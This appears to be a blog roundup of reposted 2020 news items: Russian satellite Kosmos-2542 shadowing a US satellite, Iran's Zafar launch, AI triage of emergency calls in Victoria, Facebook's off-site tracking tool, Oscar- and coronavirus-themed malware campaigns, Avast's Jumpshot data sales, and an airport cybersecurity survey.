NATO general complained about Russian kosmos satellite claiming it is spying on their military intelligence satellites

Last month, a Purdue University graduate student specializing in astrodynamics reported that Russia’s Kosmos-2542 satellite had begun shadowing USA-245, an American reconnaissance satellite. Kosmos-2542’s mystery mission quickly sparked hysteria among the US media, with some observers suggesting it could be preparing to “attack” its US counterpart.
Russian and Chinese satellites maneuvering near Western powers’ satellites in space are a threat to the NATO alliance, Allied Command Transformation Commander Gen. Andre Lanata has said.
“Of course, it is a threat to our allies,” Lanata said , speaking to The Washington Examiner. “Until now, space was considered by everybody as a safe haven. It’s not the case anymore,” he added.
According to the commander, the danger posed by Russia and China in this area is “a key question,” and NATO “need[s] to be sure that we give to our forces this space asset support.” Lanata clarified that NATO as an organization would not “own any space assets,” and that it was not the bloc’s responsibility “to take specific measures to protect such or such national assets.” The problem will have to be addressed by the bloc’s individual members, he indicated.
Recently, US media have reported on the activities of Russian inspector satellite Kosmos-2542, indicating that the satellite was stalking USA-245, a spy satellite used by American intelligence agencies. According to amateur satellite observer and Purdue graduate student Michael Thompson, the Russian spacecraft has come to within 150 and 300 km of its US counterpart, and viewed it from various angles. The researcher avoided jumping to any conclusions, saying that although Kosmos-2542’s behaviour might seem suspicious, he could not prove any malign intent.
However, US media rushed to alarming conclusions, suggesting the Russian satellite’s behaviour may be “some kind of preparation for an attack,” and that Kosmos-2542 may actually be a “killer satellite”
getting ready to ram or shoot lasers at USA-245.
Kosmos-2542 was launched from the Plesetsk Cosmodrome in November 2019, with the stated mission of inspecting the condition of other Russian satellites orbiting the planet.
Last month, observers reported that the Kosmos-2491, another Russian satellite capable of maneuvering and inspecting other satellites in orbit, appeared to have broken up. Amateur observers suggested that that satellite, believed to have been dead for several years, may have deliberately self-destructed .
Russia isn’t the only country thought to engage in clandestine inspections of foreign satellites in orbit. In 2019, the Secure World Foundation reported that the US used its own secretive ‘Geosynchronous Space Situational Awareness Program’ to approach and inspect Russian, Chinese, Pakistani and Nigerian satellites, both civilian and military.
In late 2019, President Trump formally ordered the Pentagon to establish Space Force, the sixth branch of the US armed forces. Observers have expressed fears that the force’s creation could lead to the militarization of space.

Iran has unsuccessfully launched it fourth satellite, called Zafar ("Victory" in Farsi), into orbit on 9 February. It was preceded by two unsuccessful launch attempts in 2019 and is expected to be followed by the delivery of four more satellites.
The launch, however, was denounced by the US, which claims the carrier rocket can be used to deliver nuclear warheads and that the whole project was cover for a long-range ballistic missile test.

Iranian flag fluttering in front of Iran's Safir Omid rocket, which is capable of carrying a satellite into orbit, before it's launch in a space station at an undisclosed location in the Islamic republic
Tehran denies that the rocket carrier is intended for military use, indicating that the satellite's mission will be to take ground photos and collect data needed to study earthquakes and deal with other natural disasters. Iran has also long denied pursuing the goal of producing nuclear weapons, insisting that their use
goes against Islam . The Islamic Republic's authorities have also repeatedly pointed out that its nuclear sites are monitored by the International Atomic Energy Agency (IAEA).

© AP PHOTO / DONALD J. TRUMP TWITTER ACCOUNT
Image of Iran's Rocket Failure Tweeted by Trump Claimed to be Taken by US Top-Secretive Spy Satellite
The US and Israel, however, have refused to retract their accusations. Instead, in 2018 the Trump Administration withdrew from the Iran nuclear deal, which had limited the country's nuclear programme's development, and imposed sanctions against the Islamic Republic. The imposition of sanctions has led Tehran to stop adhering to the deal's provisions, almost two years after Trump first called the accord's existence into question.

The Russian Defence Ministry stated on 7 February that a civilian Airbus-320 with 172 passengers on board was nearly destroyed amid Israeli airstrikes near Damascus in the early hours of 6 February.
An Airbus-320 has been captured on video when landing at the Russian-operated Hmeymim Airbase in northwestern Syria while trying to avoid Israeli shelling.
Russian TV channel Zvezda has published camera recordings at the Hmeymim Airbase, showing how the Airbus-320 successfully lands , and after the end of the strikes, takes off again in the direction of Damascus International Airport.
On 6 February, four Israeli F-16 fighters fired eight air-to-surface missiles in the suburbs of Damascus, according to the Russian Defence Ministry.
The Syrian air defence systems that were on alert responded to the attack while a civilian Airbus-320 with 172 passengers was almost caught in the cross-fire. The plane managed to leave the area and successfully land at Russia’s Hmeymim base, the closest alternative airfield.
Syrian diplomats slammed Israel for "taking advantage of the fact that Syria is busily engaged in its war against the terrorist groups in Idlib, and taking cover behind civilian flights, with complete disregard for the lives of civilians".
The Israeli Defence Forces (IDF) have declined to comment on the situation .
Russia and Syria have already accused the Israeli air force of using other aircraft as a shield and putting the lives of innocent people at risk. In September 2018, the Russian military held Israel responsible for an Il-20 plane crash in Syria , which claimed the lives of 15 Russian servicemen. The plane was accidentally downed by a missile launched via Syria's air defence system at Israeli F-16 jets that were carrying out airstrikes in Latakia Province.

The Emergency Services Telecommunications Authority (ESTA) in Victoria, Australia has decided to use artificial intelligence (AI) to help
Triple Zero call takers (000) identify the incidence of a heart attack on the phone without wasting much time.
According to Health Minister Jenny Mikakos, the state government’s coffers will grant $1.36m to Ambulance Victoria for designing and implementing the Cardiac Arrest Project in collaboration with Monash University.

Furthermore, an additional $350,000 will be given to Ambulance Victoria from the safer care Victoria innovation fund to start offering SMS and video calling facility under the project Tele-HELP for mental health-related emergency callers.
As per the details shared by the ministry, the AI technology will run in the background all the time and monitor every incoming emergency call to identify similar patterns of sound, keywords, and language for detecting cardiac arrest symptoms.
The government states that the system will instantly alert the ESTA triple zero call takers after which a high-priority ambulance will be dispatched and “talk bystanders through CPR or defibrillation.”

Through this project, the government aims to save 185 more lives per year. In incidents involving heart attacks “every second counts,” Mikakos explained, and AI will help paramedics provide medical help quickly to reduce the likelihood of brain damage and death.

Facebook recently finally rolled out the Off-Facebook Activity tool that it has been working on since August 2019.
The tool can help you limit Facebook’s tracking of your activities, something that the social network has received immense criticism for, and determine how far you can allow it to monitor your activities on other websites. You can also decide what information you want to be associated with your Facebook account.
What Off-Facebook Activity actually does is that it turns off storing and sharing of data sent to Facebook by third-party apps and websites that Facebook users access. This is how Facebook manages to keep a tab on all your activities. Even if you use a Ring Doorbell app, this would be recorded by Facebook.
The volume and magnitude of the data collected by Facebook is immense. And, it is indeed a great idea to rebuild the lost trust of Facebook users by allowing them to Clear History, a term Facebook’s CEO Mark Zuckerberg has associated with the new feature.
For your information, third-party apps and websites use the Pixel and Software development kit (SDK) from Facebook to store information about all your activities and the devices you use. This information is regularly shared with the social network, which uses it to bombard your computer and mobile screens with targeted ads.
Therefore, if you wonder how Facebook started displaying ads related to the product you just checked out on Amazon or eBay, this is how it is done.
Off-Facebook Activity is a welcome change from Facebook and can be seen as a step towards upholding consumer privacy, something that the company so far has compromised upon to a great extent. This tool is part of a multi-step strategy to address these issues. As explained by Zuckerberg:

“Other businesses send us information about your activity on their sites and we use that information to show you ads that are relevant to you. Now you can see a summary of that information and clear it from your account if you want to.”


You can find this tool in your Facebook Settings menu under the Your Facebook Information option. There you will find several options including Manage Your Off-Facebook Activity that allows you to determine the information you want individual sites and apps to share with Facebook.
Settings >> Your Facebook Information >> Off-Facebook Activity >> Manage Future Activity >> Turn the toggle *off* and disable Future Off-Facebook Activity.
The Clear History option wipes all the information Facebook has stored so far about you and Manage Future Activity lets you choose what sort of information you want Facebook to collect and store about you.

Cybercriminals are always looking out for ways to capitalize on anything that can generate instant clicks or trick users into downloading malicious malware. It could be trending news or natural disasters . This time around, crooks have chosen none other than the entertainment industry’s biggest and most anticipated event- the Oscars.
Reportedly, cybercriminals are using Oscar movie nominations as bait to lure users into downloading malware.

According to a press release by Kaspersky Labs security researchers, there are hundreds of phishing and malware-infected websites ready to distribute malicious software. The malware is hidden in files claiming to be “free downloads” of movies nominated for Oscar’s best picture award for the year 2020.
As it always happens with phishing scams, unsuspecting users are tricked into providing personal and sensitive information including credit card details to download a free version of Oscar-nominated movies such as Joker.
The event is due to be held on February 9, 2020, and this seems to be a perfect time and opportunity for scammers to make money from the hype generated for Oscar-nominated movies.
See: California man may get 6 months in prison for uploading Deadpool on Facebook
Kaspersky identified that Joker is the most widely used movie for tricking users into handing out financial details and downloading malware.
One of such scams targeting Oscar-nominated Ford vs Ferrari movie.
As per Anton Ivanov , malware analyst at Kaspersky, scammers don’t really care about the dates on which a movie premiers because they aren’t distributing actual movie but malicious software using the movie name as bait.
1 1917
2 Ford v Ferarri
3 Jojo Rabbit
4 Joker
5 Little Women
6 Marriage story
7 Once upon a time in Hollywood
8 Parasite
9 The Irishman
To stay protected you must never download any file from illegitimate or unknown streaming platforms and only use the legal streaming website to eliminate the risk of infecting your device or revealing bank details. In this regard, you can rely on services like Amazon Prime, Netflix, Disney+ and Hulu.
Furthermore, always research a bit about the website you are going to select a movie or video from before hitting that download button. Last but not the least, do remember that if something seems too good to be true, it actually isn’t worth your time or effort.

Coronavirus emergency is being used to spreads dangerous Emotet trojan

Coronavirus emergency is being used to spreads dangerous Emotet trojan.

We have seen cybercriminals exploiting global events such as theFootball World Cup, Christmas or disasters like missing Malaysia Plane (MH-370) to spread malware or misguide masses. But, this time, Coronavirus, a global health emergency is being used by crooks to not only spread malware butsiphon off sensitive and personal data from unsuspected users.

Cybersecurity firms IBM X-Force and Kaspersky have identified a new campaign in which botnet-driven, malware-infected emails are being sent to unsuspected users. What makes it utterly disgusting is the fact that scammers are using coronavirus theme to trick the recipient into opening it.

Reportedly, these emails contain attachments, which are promoted as notices containing details of coronavirus infection prevention measures.

It is indeed ironic that scammers are using the name of coronavirus to distribute another malware widely known as the Emotet Trojan. Previously, the Emotet malware was distributed through corporate-style payment invoices and notification emails only, but this time around the impact of the campaign will surely be higher given the global nature of coronavirus infection scare. 

IBM X-Force observed that a majority of these emails are written in the Japanese language, which suggests that the attackers are deliberately targeting users from locations most affected by coronavirus outbreak. 

The subject line of the emails contains a Japanese language word that means notification, and displays the current date to generate an environment of urgency. Furthermore, the emails are disguised as infection prevention information sent by a Japan-based disability welfare service provider.

Here’s what the email looks like:

Screenshot and translation credit: IBM X-Force

 In a blog post, IBM X-Force team wrote that:

“The text briefly states that there have been reports of coronavirus patients in the Gifu prefecture in Japan and urges the reader to view the attached document.”

There are several versions of the email, all having the same language but highly different Japanese prefectures such as in some it is Osaka while in some Tottori is mentioned. The email ends with a footer displaying an authentic mailing address, fax and phone number of the targeted prefectures’ relevant health authority. 

Apart from using the coronavirus theme, the rest of the campaign strategy is rather mundane. When the recipient opens the attached document, an MS Office 365message appears asking the user to enable content in case the document opens in a protected view.

If the document opens with macros enabled, a hidden VBA macro script enables PowerShell to activate the Emotet executable and download the malware. It is the same technique used in all the previous Emotet email campaigns, said IBM X-Force researchers. 

However, Kaspersky states that the Emotet malware campaign is just one of the many campaigns utilizing the coronavirus scare to attract unsuspecting users. They have identified 10 different documents aiming to infect devices using coronavirus theme.

“The discovered malicious files were masked under the guise of .PDF, .MP4, .DOC files about the coronavirus [containing] video instructions on how to protect yourself from the virus, updates on the threat and even virus-detection procedures.” But, actually delivering Trojans and worms that can destroy, block, copy or modify data or interrupt computer/network operations, explained Kaspersky researchers.

Coronavirus originated in China’s Wuhan province and rapidlytransformed into a global health crisis. Apparently, scammers and cybercrooks have nothing to do with the planet as they consider it a wonderful opportunity to infect a few devices. Users must not click on such emails or download attachments to protect their device.

https://uccinfo.blog/2020/01/31/ucc-highlights-january-2020/?fbclid=IwAR3UHshF_SbPhtEaBNkRbkwdIvABsgsdoqk4XxajETCcQtm_aZqx1PnW5hk

On 28/1/2020 it was reported that avast was stealing user data and selling it...Are you safe?

The anti-virus giant Avast has announced shutting down one of its subsidiaries called Jumpshot after the company was found stealing user data and selling it for big bucks.
On January 28th, 2020 based on the investigation by PCMag and Vice, Avast was secretly stealing browsing data from millions of its customers and selling it to third-parties. Some of its active buyers included Google, Pepsi, IBM, Yelp, Microsoft, TripAdvisor, and Unilever, etc.
Avast’s data collection worked or still works in such a way that the software collects all of your browsing data which is then accessed by Jumpshot. The latter in return takes it and uses it as a part of what makes up its product offerings.

An example of it is Avast’s “All Clicks Feed” which lets companies access your behavior on the internet and any clicks you make on any particular range of domains. Reportedly, Avast sold user data to one of its New York-based customer for a hefty sum of $2,075,000.

How Jumpshot functioned – Image credit: Motherboard

However, in a blog post published on 30th January Avast CEO Ondrej Vlcek apologized to their customers and announced shutting down Jumpshot.

“Protecting people is Avast’s top priority and must be embedded in everything we do in our business and in our products. Anything to the contrary is unacceptable.  For these reasons, I – together with our board of directors – have decided to terminate the Jumpshot data collection and wind down Jumpshot’s operations, with immediate effect,” wrote Vlcek in his blog post.

Vlcek also maintained that Jumpshot did not break GDPR rules and committed themselves to 100% GDPR compliance.
“Jumpshot has operated as an independent company from the very beginning, with its own management and board of directors, building their products and services via the data feed coming from the Avast antivirus products,” Vlcek added.
“During all those years, both Avast and Jumpshot acted fully within legal bounds – and we very much welcomed the introduction of GDPR in the European Union in May 2018, as it was a rigorous legal framework addressing how companies should treat customer data. Both Avast and Jumpshot committed themselves to 100% GDPR compliance. “

This is not the first time when Avast made headlines for stealing customer data. In December last year, Google banned Avast security extensions including AVG security over data snooping.
Nevertheless, the damage for Avast is done and it may be too late to apologize or shutting down Jumpshot. As a customer, the main purpose of using anti-virus software is to protect our data from online crooks, malicious hackers and cybercriminals and Avast has turned out to be all three. 

The cyber security status of top 100 airports,where is ENTEBBE?

New research from web security company Web finds that 97 out of 100 the world’s largest airports have security risks related to vulnerable web and mobile applications, misconfigured public cloud, Dark Web exposure or code repositories leaks.

The 2020 annual meeting of the World Economic Forum (WEF) urged the consideration of emerging cybersecurity challenges in the aviation industry, addressed in its “Advancing Cyber Resilience in Aviation: An Industry Analysis” report.

To shed some light on the current state of aviation transportation security, ImmuniWeb decided to conduct research on cybersecurity, compliance and privacy of the world’s largest airports.

Key findings

Top 3 Most Secure Airports:

During the research, ImmuniWeb identified three international airports that successfully passed all the tests without a single major issue being detected:

— Amsterdam Airport Schiphol (EU)
— Helsinki-Vantaa Airport (EU)
— Dublin Airport (EU)

Main Website Security:

Application weaknesses and software vulnerabilities continue to be the most common means by which cyber criminals carry out external attacks says Forrester in its recent research.

Regrettably, only 3 main (“www.”) websites of the airports received the best possible “A+” grade, 15 got an “A” grade:

As many as 24 of the main websites had a failing “F” grade, meaning that they had outdated software with known and exploitable security vulnerabilities in CMS (e.g. WordPress) and/or web component (e.g. jQuery). Some of the websites even had several vulnerable components as detailed below:

— 97% of the websites contain outdated web software
— 24% of the websites contain known and exploitable vulnerabilities
— 76% and 73% of the websites are not compliant with GDPR and PCI DSS respectively
— 24% of the websites have no SSL encryption or use obsolete SSLv3
— 55% of the websites are protected by a WAF

Mobile Application Security:

During this research, we found and tested 36 official mobile applications belonging to the airports. In total, 530 security and privacy issues were identified, including 288 mobile security flaws (15 per application on average). We found that:

— 100% of the mobile apps contain at least 5 external software frameworks
— 100% of the mobile apps contain at least 2 vulnerabilities
— 15 security or privacy issues are detected per app on average
— 33.7% of the mobile apps outgoing traffic has no encryption

Dark Web Exposure, Code Repositories and Cloud:

Compared to the Fortune 500 companies’ exposure, global airports are doing fairly well. For the purpose of this research, ImmuniWeb leveraged its award-winning AI technology to distil findings from the Dark Web marketplaces and other locations, notably to remove duplicates, fakes and irrelevant findings.

After purification of the results, the research team found that 66 out of the 100 airports are exposed on the Dark Web in one way or another. 13 airports have leaks or exposures of a critical risk:

— 66% of the airports are exposed on the Dark Web
— 72 out of 325 exposures are of a critical or high risk indicating a serious breach
— 87% of the airports have data leaks on public code repositories
— 503 out of 3184 leaks are of a critical or high risk potentially enabling a breach
— 3% of the airports have unprotected public cloud with sensitive data

Ilia Kolochenko, CEO & Founder of ImmuniWeb, comments: “Given how many people and organizations entrust their data and lives to international airports every day, these findings are quite alarming. Being a frequent flyer, I frankly prefer to travel via the airports that do care about their cybersecurity. Cybercriminals may well consider attacking the unwitting air hubs to conduct chain attacks of travellers or cargo traffic, as well as aiming attacks at the airports directly to disrupt critical national infrastructure.

Today, when our digital infrastructure is extremely intricate and intertwined with numerous third-parties, holistic visibility of your digital assets and attack surface is pivotal to ensure the success of your cybersecurity program. Without it, all your efforts and spending are unfortunately vain.”

How to Reduce the Risks

— Implement a continuous security monitoring system with anomaly detection to spot intrusions, phishing and password re-use attacks.

— Run a continuous discovery and inventory of your digital assets, visualize your external attack surface and risk exposure with an Attack Surface Management (ASM) solution enhanced with Dark Web and code repositories monitoring.

— Implement a holistic, DevSecOps-enabled application security program to test and remediate your web and mobile applications, APIs and OSS in a timely manner

— Implement a third-party risk management program encompassing continuous monitoring of your vendors and suppliers going beyond a paper-based questionnaire.

— Invest in security awareness of your personnel, explain the risks of using professional emails on third-party resources, gamify anti-phishing training and reward the best learners.